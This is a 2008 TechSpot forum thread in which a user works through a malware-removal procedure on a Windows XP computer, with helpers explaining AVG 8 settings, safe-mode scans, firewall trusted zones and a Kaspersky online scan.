TechSpot

Preliminary AVG AS to Super AS

By altair9
May 7, 2008
  1. Hello!

    Never cleaned the computer (Win XP 32 SP2 - AMD K7 1000 MHZ), only an obsolete Norton Internet Security 2005 + Norton Antivirus installed...

    Yesterday I installed some free antimalware utilities (lots of popups, slow navigation, etc...) and I found globally more than 500 infections!!! Some very dangerous. Initially some rootkits crashed (blue screen) the system while running AdAware full scan. I gradually removed them with some utilities freeware and then I used AdAware... But once it found the system "Clean", the new PC Tools Doctor (free version) found lots of other problems... I manually removed all the files and registry keys... but I always found some infections (less).

    Surfing in these forums, I found lists of files that I should delete and that I have! For example: swxcacls.exe - swsc.exe - etc...

    So NOW I found and I'm running the excellent "preliminary removal instructions" step by step.

    I totally uninstalled the Norton. I installed the beautiful COMODO Firewall PRO.

    Now I'm running the TREND Micro on line virus scanner, but I ALREADY have installed (last night) the HJT latest version, the Super Anti Spyware Home Free (latest version), the Ad-Aware 2007 (latest version).

    These are my questions:

    1) Should I uninstall them, re-download and re-install again? or are the installed ones good? (I disabled all the real time monitoring programs).

    2) I have already installed in my system the AVG Antivirus 7.0. It is updated. Now there is the 8.0. What should I do? should I uninstall the 7.0 (but it is live-updated) and install the 8.0, or is it good the 7.0?

    3) In the first case, should I re-make the TREND Micro on line virus scanning of my system? Should I uninstall the COMODO Firewall Pro, then install the AVG 8.0 and then re-install the COMODO Firewall Pro (to let me follow your step-by-step instructions), or may I leave it installed while installing the AVG 8.0 if necessary?

    MOST IMPORTANT:
    4) "Step 14": "Run AVG AntiSpyware".... But it does not exist yet! I read in your yesterday reply:

    * Many, many changes before writing this.
    * Step 6, contributed by Blind Dragon. Updated AVG AS for SuperAntiSpyware OR Malwarebytes' Anti-Malware.

    And I already installed the SuperAntiSpyware; but what about the AVG AS log file that you want me to attach here? Should I use the Anti Spyware capabilities of the new AVG 8.0 and attach its log (if it makes a log!), or should I attach the Super AS log in place of the AVG AS log?

    Thank you very much - yours is a great work!
     
  2. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    You should realize that each set of malware cleaning instructions is particular for the user who has the malware. The directions given to that person may not be appropriate for you. Therefore you should begin at the beginning:

    http://www.techspot.com/vb/topic58138.html

    posting your logs as instructed. Then you will be helped individually and the help will be directed to the results of your particular logs.
     
  3. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    thank you

    thank you for your prompt reply, Bobbye.

    The topic that you wrote me (58138) is the procedure that I'm running! I'm running exactly the step N. 3, and all my questions regard this procedure:

    Viruses/Spyware/Malware, preliminary removal instructions
    Closed Thread

    Now the TrendMicro scanning is finished and it deleted and removed some malware... and it asked me to repeat the scanning to be sure.... it seems a good idea, but it needs about 2-3 hours!!!!
     
  4. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    Yes, I already messaged Julio about step 14 needing to be updated as well after updating step 6.

    If you want to install AVG 8.0 that is fine to leave the other programs in place. Superantispyware won't conflict with AVG antispyware which is now bundled with the AVG anti virus. Which is the reason for the update. Because what if users want Avast or my recommendation Avira Antivir instead of AVG, then there is no way for them to get only AVG AS without having a 2nd AV product.

    Leave Comodo and Adaware 2007 as they have nothing to do with these instructions.

    So in short - if you want AVG as your antivirus you will also get AVGAS. Which will NOT conflict with the other antispyware suggestions. If you want another AV product such as avast or antivir then you still have no conflict. Don't worry about step 14 unless you do get AVG. I would also recommend if you get the new AVG to opt out of the toolbar that it wants to install

    You dont want:
    More than 1 active firewall
    More than 1 active anti-virus
    More than 1 real time protection from Antispyware

    The free versions of MBAM and SAS don't have real time protection anyways, they are scanners only
     
  5. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    ok

    Thank you too Blind Dragon.

    I'm going to:

    - Uninstall actual AVG 7.0 (without rebooting). Or should I reboot?
    - Install AVG 8.0
    - Update it

    And then what should I do? should I reboot? should I leave AVG 8 active or unactive? (then I'll make the STEP 5).

    Thank you again.
     
  6. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    After install you want AVG active but AVG Antispyware real time protection disabled as it can interfere with the other instructions.

    You are going to boot into safe mode and scan with AVG AV, then AVG AS. The only thing that is disabled is real time protections
    • select the Icon at the top that says SHIELD then at the top of the left pane change "Resident Shield is ..." from Active to Inactive
    • Select the Icon at the top that says UPDATE then Start Update in the left pane
    • After the update click on the Scanner Icon at the top, then select the settings tab, in the first section "How to act?" click on recommended actions and change it to delete.In the reports section make sure it is set to Automatically generate report after every scan
    • Click back to the Scan tab and select Complete System Scan
    • Finally, after the scan, select the Infections Icon at the top, click Select All at the bottom then Remove finally also at the bottom
     
  7. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    edited the above with more detail for you to save or print for use while in safe mode
     
  8. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    Ok.

    So now:

    1) I'll uninstall the older AVG 7.5
    2) I'll reboot to let windows make the uninstall effective
    3) I'll install the new AVG 8.0
    4) I'll reboot if it will ask me, if not I directly:
    5) all the steps that you wrote me now.

    Then I'll repeat the scan in SAFE MODE BOOT, because in SAFE MODE the internet connection doesn't work, so I couldn't update the AVG (wi-fi to a d-link router...).

    Thank you.
     
  9. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    1) I'll uninstall the older AVG 7.5
    2) I'll reboot to let windows make the uninstall effective
    3) I'll install the new AVG 8.0
    4) I'll reboot if it will ask me, if not I directly:
    5) select the Icon at the top that says SHIELD then at the top of the left pane change "Resident Shield is ..." from Active to Inactive
    # Select the Icon at the top that says UPDATE then Start Update in the left pane
    # After the update click on the Scanner Icon at the top, then select the settings tab, in the first section "How to act?" click on recommended actions and change it to delete.In the reports section make sure it is set to Automatically generate report after every scan

    6) Later when you boot into safe mode you will # Click back to the Scan tab and select Complete System Scan
    # Finally, after the scan, select the Infections Icon at the top, click Select All at the bottom then Remove finally also at the bottom

    So you want to update it and set the correct settings now while you have access to the forum, then later in Step 14 when you are in safe mode you will scan - the reason is so that infected files are not active and running
     
  10. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    ok thank you, very useful tips!

    Now it's installing the new AVG and the wi-fi usb antenna is unplugged (to be sure...)... I'm writing from another computer of friends...

    When the installation will finish, then I'll replug the wi-fi usb antenna and I'll make all the steps of yours.

    I'll let you know...

    Thanks again.
     
  11. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    Not a problem, Good luck and if you are unsure at any point stop to ask
     
  12. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    smitfraudfix...

    Hello...

    Using SmitFraudFix in SAFE MODE.... made "clean".. etcc....

    But now.... what is this "trusted zone"?

    All the sites wrote that "it let us restore the trusted zone"... but nobody explains what is this trusted zone.....

    Should I run also this option?

    Thanks.
     
  13. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    A firewall works by having network connections divided into three zones:

    The "trusted zone" generally includes the user's Local Area Network and can share resources such as files and printers.
    The "Internet zone" includes everything not in the trusted zone. The user can specify which "permissions" (trusted zone client, trusted zone server, Internet zone client, Internet zone server) to give to a program before it attempts to access the Internet (e.g. before running it for the first time)

    The third zone can be use to block Domains and/or specific URLs.
     
  14. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    yep, some infections will add themselves to the trusted zone in your browser, then they can redirect you, or they may be known bad sites that your browser normally blocks that after let you get redirected there anyways. It's really not necessary as we can use other tools to prevent this if it is a problem
     
  15. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    continuing the steps....

    32 hours with the computer... my eyes are burning red!

    I have almost finished the "preliminary..." procedure.

    I arrived to the step of make a complete antivirus scan in SAFE MODE.

    But... AVG 8.0 can't scan as GUI app. in SAFE MODE: only command line!

    Where all the other programs of the first about 10-12 steps found nothing (thanks to the On Line TrendMicro HouseCall scanner that cleaned lots of things and thanks to other programs like adaware in the other steps... and hours and hours of work...), while despite all these procedures (and ccleaner and the three tools of the step 10, etc...), AVG command line founds a lot of:

    - Adware generic - ActiveX compatibility (in the registry).

    - an Adware shorty, an Adware Virtumonde, (always activex compatibility)
    - a Trojan.zapchast (always activex compatibility)

    Now it is scanning the hard disk files.... And I can't make a log of this scan, because it is in a command line and the prompt has got a short vertical scroll bar: it can go up and down only a bit.

    Here are my questions:

    1) How can I tell you what did the AVG find?

    2) You could tell me: "see the step 14 and run the AVG Antispyware, and attach us the log file in the forum". But here's the problem: AVG antispyware doesn't exist yet; not its antispyware capabilities are in the AVG antivirus 8.0, but it can only run in command line if windows is SAFE MODE, so NO REPORT!
    If I use SuperAntiSpyware it founds... NOTHING! So:

    3) How can I replace the AVG Antispyware? another equivalent free product? I have installed also the PC Tools Spyware doctor, is this good?

    4) Or should I run AVG complete scan (malware too) in Windows Normal mode and save a log (if possible!!)?

    Thank you very much.

    Talk to you soon...

    PS: may be a "solution": I tried to add a "> filename" in the command line... but while it processes I see nothing (and the process is very long...) and I fear that the file will grow becoming an encyclopaedia.... EACH file of more than 500'000 showed in it... plus the whole registry... (So I stopped it with CTRL C) ... but I bet that you are burning to read this file... COMPLETE!! :D :D
     
  16. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    I can do without the log, I usually like to check them to make sure it says that the files it found are quarantined or deleted, vs no action taken by the user
     
  17. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    no!... other hours of scan.... :(
    I used the option /clean (with others...), not the option /trash (now I remember... I found it on web...)....

    don't tell me that I must re-scan all the computer... it is still working... the "windows" folder is a black hole that approach towards the infinite...

    I run this:

    avgscanx /comp /heur /clean /boot /pup /reg /coo

    /comp = complete whole computer
    /heur = heuristic scan (I hope that doesn't exclude the normal scan but that this ADDS the heuristic scan!)
    /clean = I don't know exactly what does it means for "clean"
    /boot = scan the boot sector too
    /pup = potentially unwanted programs (if I remember...)
    /reg = registry
    /coo = cookies

    I don't know if /clean DELETES the files and the strings that couldn't be cleaned, or if it leaves them there!
     
  18. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    F I N I S H E D !!!!

    FINISHED!

    I run the whole procedure "preliminary removal instructions".

    These are the results:

    ...

    Step 3 TrendMicro online antivirus:

    I made it two times, because the first time I had problems and I restarted the WHOLE procedure. The first time it revealed lots of problems and CLEARED and finished the scanning.

    The second time (the good whole procedure), it found only 2 "problems", and it healed one, but the other... it couldn't finish the cleaning process and I had to close the browser's page!

    I attach a screenshot about the latest unresolved unremoved problem. Its name:
    Trendmicro.jpeg

    ...

    STEP 11:

    The Panda Antirootkit program: since at this step of the procedure I was offline with the internet wifi antenna unplugged (to be sure), I couldn't update it, but I launched it anyway.
    This are the RESULTS:

    No rootkits have been found.

    All items I read a beautiful "0".

    But then, after the STEP 14, when I rebooted in NORMAL mode and I reconnected to Internet, before launching the Hijackthis (whose file was renamed by me in the STEP5), I re-launched the Panda Antirootkit, and let it upgrade.

    So it told me that to scan the computer it had to Reboot (after the upgrade) and I made this.
    RESULTS: the same: "No rootkits have been found".


    STEP 12:

    COMBOFIX.

    I attach the file. Name:

    ComboFix.txt


    DECKARD's SYSTEM SCANNER:

    I attach the files. Names:

    dss_main.txt
    dss_extra.txt



    STEP 13:

    Unfortunately I FORGOT to re-hide the hidden and system files after the step 14. I Hope that this will not affect the procedure....

    I run AVG 8.0 updated in Windows SAFE MODE: it run itself in COMMAND LINE.



    STEP 14:

    SPYBOT SEARCH AND DESTROY found only 1 voice: SpyBossPro: an ijl11.dll in the system32\ folder. I fixed it.

    ADAWARE: I couldn't find and uncheck the "scan for negligible risk entries", but I run it a Full system scan. Results:

    Infection detected: 1:
    Family Id: 789 Name: WhenU.DesktopToolbar Category: Misc TAI:5
    Item Id: 14037 Value: File: C:\System Volume Information\_restore{BB13918B-D6B0-4455-9C07-07AEF547CF22}\RP351\A0080382.ocx

    CLEANED.


    AVG Antispyware: since it doesn't exist anymore and since the new AVG 8.0 has an antispyware inside, I'll attach two "artisan pseudo-reports" file, two screenshots of the Prompt Command line of the more relevant screens of the process.
    File names:

    avg-cmdln1.JPG
    avg-cmdln2.JPG


    I hope these two files could replace a valid old AVG antispyware log file...



    Finally, STEP 15: Hijackthis.

    Log file name:

    hijackthis


    I hope all this could help...

    Thank you VERY VERY MUCH!
     
  19. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    missed attachments (no more 5...)

    And here are the other two missing attachments:


    avg-cmdln2.JPG
    hijackthis.txt




    Thank you again!

    PS: is there a way to let me set a password to "close" some resident applications (like Comodo Firewall Pro, Pc Tools Antispyware Doctor and AVG), to avoid that other users could disable them because a bit annoying?
    I can't make more user accounts, only one... used as administrator too... Thank you.
     
  20. Blind Dragon

    Blind Dragon TS Evangelist Posts: 3,908

    One more scan for me

    Run Kaspersky Online AV Scanner

    Order to use it you have to use Internet Explorer.
    Go to Kaspersky and click the Accept button at the end of the page.

    Note for Internet Explorer 7 users: If at any time you have trouble with the accept button of the licence, click on the Zoom tool located at the right bottom of the IE window and set the zoom to 75 %. Once the license accepted, reset to 100%.
    • Read the Requirements and limitations before you click Accept.
    • Allow the ActiveX download if necessary.
    • Once the database has downloaded, click Next.
    • Click Scan Settings and change the "Scan using the following antivirus database" from standard to extended and then click OK.
    • Click on "My Computer"
    • When the scan has completed, click Save Report As...
    • Enter a name for the file in the Filename: text box and then click the down arrow to the right of Save as type: and select text file (*.txt)
    • Click Save - by default the file will be saved to your Desktop, but you can change this if you wish.
    Attach the report into your next reply
     
  21. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    C:\PROGRA~1\AVG\AVG8\avgtray.exe
    C:\PROGRA~1\AVG\AVG8\avgrsx.exe
    Processes are part of AVG 8. AVG v8 has antivirus program and spyware.


    You need to remove this left-over Norton AV entry. Use Norton removal Tool:
    http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2005033108162039
    O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Programmi\File comuni\Symantec Shared\Security Center\SymWSC.exe
    Description: Installed by Norton Internet Security Center.

    Subject to approval of Blind Dragon.
     
  22. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    ok

    Thank you! I launched the kaspersky scan.... and waiting for it.... then I'll post the results in txt format...
     
  23. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    ....

    ...where the others have been unsuccesful....

    Kaspersky found something!

    Scan Progress: 51% at now...

    Until now it found:

    Number of viruses found: 8
    Number of infected objects: 18
    Number of suspicious objects: 7


    About 10 objects in this misterious folder (heavily problematic with last antiviruses too...):

    C:....hey! I can't find it even if the hidden and system files are shown!

    I remember... it was about.... C:\WINDOWS\Recovery.... or something like that.

    ...one can never be sure...!


    x Bobbye:
    I'm going to use the norton removal tool after this procedure... Thank you too!
     
  24. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    Here's the report

    Finished.

    It found:

    Number of viruses found: 13
    Number of infected objects: 35
    Number of suspicious objects: 7

    Here's the report.

    It talks about objects "closed", etc... What should I do? delete all?

    thank you...
     
  25. altair9

    altair9 TS Rookie Topic Starter Posts: 23

    Please, while judgeing the report, consider that voices like this:

    D:\CD\Outlook Express\Posta in arrivo.dbx/[From Mail Delivery Subsystem <MAILER-DAEMON@aol.com>][Date Fri, 6 Dec 2002 19:55:57 -0500 (EST)]/UNNAMED Suspicious: Exploit.HTML.Iframe.FileDownload skipped

    Regard the archive of my old emails. So if I would delete the files, I'll delete ALL the e-mails! So, please tell me if should I re-import the mails, delete THAT messages and re-export in another folder, and please tell me if does this mean any risk (because I should open the messages and click on them to delete them), or if could I make this.

    Attachment in the previous post.

    Thank you very much.
     
Topic Status:
Not open for further replies.

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...